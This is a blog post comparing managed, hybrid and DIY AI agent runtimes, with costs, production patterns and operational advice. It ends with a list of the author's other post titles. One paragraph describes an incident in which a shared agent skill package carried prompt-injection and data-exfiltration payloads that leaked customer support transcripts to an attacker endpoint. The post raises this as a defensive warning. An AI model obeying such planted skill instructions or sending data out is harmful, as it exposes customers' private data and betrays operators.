One week later, on April 15, OpenAI pushed a major Agents SDK update. Instead of running the sandbox themselves, they let you plug in E2B, Modal, Cloudflare, or Vercel. Python-first. Long-horizon tasks. Filesystem tools. The strategy is visibly different: OpenAI wants to be the coordination layer, not the runtime. "Bring your own everything — we'll orchestrate."

The same week, Anthropic shipped Claude Opus 4.7 with stronger SWE-bench numbers, and the Agentic AI Foundation (AAIF) was formalized under the Linux Foundation. Founding members: Anthropic, OpenAI, Block. Platinum sponsors: Google, Microsoft, AWS, Bloomberg, Cloudflare. MCP — which hit 97M+ monthly downloads and 10,000+ servers — was donated to AAIF along with Block's goose framework and the AGENTS.md spec (now adopted by 60,000+ OSS projects).

In other words: the protocols went neutral. The runtimes went proprietary. Pick your side.

Three approaches, told as a story

Imagine three teams, all trying to ship the same customer-support triage agent.

Team A picked Anthropic Managed Agents. They wrote a system prompt, defined three tools, and pointed at a filesystem. Anthropic's harness handles memory windows, session persistence across days, sandbox execution, and automatic state compaction when context gets heavy. The team shipped in four days. Their bill for the first month was $62 — one agent, running 24/7, with spiky load. They didn't touch credentials beyond a single API key. They didn't touch sandbox isolation. They don't know what kernel their agent is running on.

Team B picked OpenAI's Agents SDK. They already had Modal running for batch jobs and didn't want another runtime. They wired up the SDK as the coordination layer, pointed at their existing Modal sandbox, brought their own secrets manager, and used their own OpenTelemetry setup. The SDK handled tool calling, multi-step planning, and the tricky parts of long-horizon tasks. They shipped in two weeks. Their bill is model tokens plus Modal compute — roughly flat with their previous LangChain setup, but with far less orchestration code.

Team C picked LangGraph with CrewAI patterns. They're a five-person platform team and they wanted every knob. They wrote the graph, the state store, the sandbox, the retry logic, the session logger, the credential vault. They shipped in eight weeks. Their infrastructure bill is lower per-agent-hour than either A or B. Their on-call volume is higher than both combined. When the CEO asked "why don't we just use managed?" they had to write a six-page doc about control-plane sovereignty.

All three agents work. All three teams made rational choices. The difference is where they chose to spend their complexity budget.

Notice the line keeps moving up the stack. Managed hides almost everything. Hybrid hides coordination only. DIY hides nothing. The question isn't which is "better" — it's which boundary matches your team's actual constraints.

What patterns are holding up in production?

Three patterns dominate real agent deployments right now, and they're the ones to design for.

Hub-and-spoke is running the show. A TrueFoundry survey of multi-agent systems found that 66.4% of production deployments use a hub-and-spoke topology: one orchestrator agent delegates to specialist sub-agents. It's not because peer-to-peer is worse in theory — it's because hub-and-spoke is the only pattern you can actually debug at 3 AM. The orchestrator becomes the single point of observation, the single point of retry, and the single point of blame. You pay a latency tax of roughly 2-5 seconds per delegation cycle, and the pattern visibly breaks around seven sub-agents — context windows blow up, coordination errors compound, and the orchestrator starts contradicting itself. Below seven, it's remarkably stable.

Context engineering has become a real discipline. Anthropic published an essay this week — Effective Context Engineering for AI Agents — that's worth reading in full. The core idea: you don't stuff everything into the context window; you engineer what goes in and when. Key techniques include just-in-time retrieval (load tool outputs only when needed), state compaction (summarize old turns when context gets heavy), and structured memory (separate short-term scratch from long-term persistence). The Managed Agents harness implements all of this invisibly. If you go DIY, you will re-invent it badly before you re-invent it well.

State is where everything fails first. Every production incident I've read about this cycle traces back to state management. Agents that forget what they were doing. Agents that remember too much and contradict earlier decisions. Agents that can't resume after a crash. The managed harnesses solve this by making state persistence a first-class primitive. The DIY stacks treat it as a Redis key, and that's where the cracks appear first.

Real outcomes from real teams

A fintech I talked to this week migrated a three-agent fraud-review workflow from LangGraph to Anthropic Managed Agents. Build time went from six weeks to four days. Their per-review cost went up by 40% — but their on-call volume dropped so hard they reassigned two engineers off the project. Net headcount savings paid for the managed premium five times over.

Block — one of the AAIF founding members — is pushing the opposite direction. They're betting on goose, their open-source agent framework, precisely because they don't want to be locked to any single vendor's runtime. The donation of goose to AAIF this week is a strategic move: commoditize the runtime, compete on data and distribution.

Then there's the failure case. The "OpenClaw" incident hit a community Discord this month — a popular shared skill package (think: npm for agent skills) was found to contain both data exfiltration and prompt-injection payloads. Teams that had blindly installed the skill to accelerate development ended up leaking customer support transcripts to an attacker-controlled endpoint. Nothing about the managed harnesses prevents this — the skill ran with the agent's permissions because that's what skills do. Framework capture creates a supply-chain attack surface that looks exactly like the npm/pip ecosystem circa 2018, and we haven't built the defenses yet.

A large enterprise platform team (Fortune 100, can't name them) found that after six months of agent rollouts, their AWS IAM directory had grown by 14,000 new roles — one per agent deployment, most over-permissioned, most never audited. Credential sprawl scales exponentially with agent count. Nobody budgets for this.

The trade-offs, argued as a debate

Let me argue this as three voices.

The Managed Advocate says: "Look, 90% of teams aren't going to out-engineer Anthropic or OpenAI on sandbox isolation, memory compaction, or session replay. You're paying $58/month to skip three months of work. Your engineers are worth more than that per hour. The flat $0.08/runtime-hour pricing is the most honest pricing in the industry — no surprises, no per-call gotchas. If you're under 50 agents and you're not a platform company, go managed."

The Hybrid Pragmatist says: "Vendor lock-in at the runtime layer is the worst kind of lock-in. If Anthropic deprecates a harness feature, your agents break silently. OpenAI's approach is sane — own the coordination, swap the runtime. I can run the same SDK against E2B today and Modal tomorrow. Portability is a real asset. The Managed pitch is compressed time-to-market; the cost is that when you want to leave, there's no door."

The DIY Purist says: "Both of you are ignoring governance. Managed Agents hides state, credentials, and audit trails behind the vendor's abstraction. My compliance officer needs to see what data crosses what boundary, and 'trust Anthropic' isn't an answer in regulated industries. LangGraph gives me the full graph, inspectable, in my VPC. Yes, I spent eight weeks building what Anthropic gives you in four days. But I can testify in court about what my agent did."

All three are right, and the framework that matches your context is the one that matches your constraints — regulatory, team size, latency budget, and exit strategy. Don't let a launch post pick for you.

One asymmetry worth naming: the managed platforms hide the work; they don't eliminate it. State management, credential lifecycles, access governance, and incident response still exist. You're just renting someone else's solution. That's often fine. It's never free.

What I'd do differently, having watched this week

The implementation insights that matter:

The biggest challenge nobody warns you about is that debugging an agent is fundamentally harder than debugging a service. A service has a request, a response, and a stack trace. An agent has a trajectory — a sequence of tool calls, intermediate reasoning, context windows that got compacted, and decisions that depend on prior context you no longer have. Managed platforms give you session replay; DIY stacks almost never do. If you go DIY, invest in trajectory logging before you invest in anything else.

The best practice that actually pays off: scope tool permissions per-agent, not per-organization. Every agent should have its own credential bundle with the minimum set of tool access it needs. The $14,000-IAM-roles story above is what happens when you don't do this. It's tedious to set up and pays for itself the first time an agent goes rogue.

The anti-pattern I see most often: building a "god agent" with 30 tools and hoping the model picks the right one. It won't. Above roughly 10-12 tools in a single agent, tool-selection accuracy collapses. Hub-and-spoke with specialist sub-agents isn't just an architectural preference — it's a workaround for a real model limitation.

The under-appreciated pattern: state compaction as a first-class operation. When your agent's context starts to exceed 50% of the window, have it summarize its own state and start fresh. Anthropic's Managed Agents does this automatically; in LangGraph you have to wire it yourself. Agents that never compact eventually drown in their own history.

Five takeaways to act on this week

Audit your agent permissions today. Pull the IAM roles, API keys, and tool scopes for every agent in production. If any agent has access to something it hasn't used in 30 days, remove it. You'll find at least one over-permissioned agent. Everyone does.
Decide your runtime posture explicitly. Write one paragraph: "We are a Managed / Hybrid / DIY shop because [reason]." If you can't finish the sentence, you're making the choice by accident, and accidental choices in this space get expensive fast.
Add trajectory logging before you add anything else. Every agent call, every tool invocation, every context compaction. Six months from now, your incident response will depend entirely on how good these logs are.
Treat shared skills like npm packages from 2018. Review the code. Pin versions. Run them in isolation first. The OpenClaw pattern will repeat — it's just a question of which community skill gets compromised next.
Don't architect for more than seven sub-agents in a hub-and-spoke. If you think you need more, you need another hub. Plan for hierarchical hubs from day one rather than discovering the seven-agent wall in production.

Deep dive resources worth your time

Anthropic: Managed Agents announcement and teardown — Why the $0.08/hr flat pricing matters, and what the harness actually includes. Read this first if you're evaluating Managed.
Anthropic: Effective Context Engineering for AI Agents — The essay that underpins the Managed Agents design decisions. Even if you go DIY, the patterns (just-in-time retrieval, state compaction, structured memory) are the real lesson.
TechCrunch: OpenAI Agents SDK April update — The clearest summary of the BYO-sandbox strategy and why OpenAI deliberately chose not to compete on runtime.
OpenAI: Agentic AI Foundation announcement — The political economy of the standards layer. Who signed, who didn't, and what that tells you about the next 18 months.
TrueFoundry: Multi-agent architecture patterns in production — The 66.4% hub-and-spoke number and the data behind it. Read for a grounded view of what actually ships.
Kai Wähner: Enterprise Agentic AI Landscape 2026 — The most honest treatment of vendor lock-in risk I've read this quarter.
MCP 2026 Roadmap — What standardizing tools looks like when the protocol goes to the Linux Foundation.

Sources and attribution

Anthropic, Managed Agents Public Beta (April 8, 2026)
Anthropic, Effective Context Engineering for AI Agents (April 2026)
TechCrunch, OpenAI Agents SDK enterprise update (April 15, 2026)
OpenAI, Agentic AI Foundation announcement (April 2026)
MCP, 2026 Roadmap (blog.modelcontextprotocol.io)
TrueFoundry, Multi-agent architecture in production survey (2026)
Kai Wähner, Enterprise Agentic AI Landscape 2026 (April 6, 2026)
Enterprise LLM API spend figures: referenced from market research cited in AAIF launch materials; 50% (2023) to 27% (2026).
OpenClaw incident: community reports (April 2026, composite of multiple Discord and mailing list incidents).

The agent platform wars aren't over. They just stopped being about who has the best model and started being about who owns the runtime. Pick your boundary deliberately — because this week, the vendors finally drew theirs.

DEV Community: Anil Kurmi

The Agent Harness Is the Real Product. The Model Is Just the Engine.

The 5-Minute Skim

Visual Architecture: The Harness Is the Loop

Why does this conversation matter now?

What is actually inside a harness?

Why is per-model tuning real engineering, not a config flag?

VSC-Bench: when more thinking hurts

The PR-level eval pipeline

Skills as a harness extension primitive

The unsolved problem: behaviour

What you should do next

Claude Code didn't get worse. The harness did. And that ends one of the most common AI complaints of 2026.

What actually broke

Why this is the most important engineering document of 2026 (so far)

The thing I want every AI product team to internalize

What I want pushback on

What this changes for engineers shipping LLM features

Further reading

MCP just walked into enterprise SaaS like it belonged there, and most people missed it

Why this launch is the bigger signal

What's actually under the hood

The opinion I keep arguing with people about

Where the optimism gets uncomfortable

What this changes if you're a developer

The honest counter-position

Further reading

A 1.3B model just shipped that runs on your phone, and the labs obsessed with frontier scores won't see this story coming

Why a 1.3B model is the bigger story

The shift nobody's narrating loudly enough

The skeptical case I keep arguing with

The architectural pattern I think wins

What this means if you're a developer or PM

Where I want pushback

Further reading

OpenAI's Deployment Company is the biggest AI move of 2026, and most of the industry hasn't clocked it

Why this isn't a "services play"

The Tomoro detail is doing a lot of work

Where I think this lands in 18 months

What it means if you're an engineer

The skeptical case I keep arguing with

Further reading

The 'AI is replacing engineers' narrative is mostly bullshit, and I'm tired of pretending otherwise

The data and the story stopped matching

Why the AI narrative is the convenient one

What I think is actually happening

What I want to be wrong about

If you're an engineer and you're scared right now

Further reading

Why We Didn't Converge: ClickHouse's VLDB Paper and the Architecture Agents Actually Need

The moment ClickHouse writes CPU code for your query

The 5-minute skim

Why is this the week to talk about data architecture?

What are the four pillars of ClickHouse?

Why did Snowflake and Databricks pivot away from HTAP?

What did the fintech learn the hard way?

Is database branching really Git for data?

What is the Lakehouse 2026 pattern?

How should I think about the trade-offs?

When should I split and when should I converge?

Five things to take away

Event-Driven Agents: Why Direct CDC Just Killed the Kafka-Debezium-Kafka Stack

The 5-Minute Skim

Why this week?

Why does request/response fail for agents?

Visual architecture: what does the new stack look like?

Kafka vs REST vs MCP: what's the hierarchy?

What is the CDC simplification revolution?

When does CEP win and when does it fail?

Trade-offs: Kafka vs direct CDC, streaming vs polling, CEP vs agent

What are the implementation patterns and anti-patterns?

Actionable takeaways

The Agent Identity Crisis — Why OAuth Breaks at Machine Speed

What happened on March 31?

5-Minute Skim

Why this week?

Why does OAuth break for agents?

Visual Architecture Model

The MCP supply-chain risk

The Axios war story — what OAuth would have prevented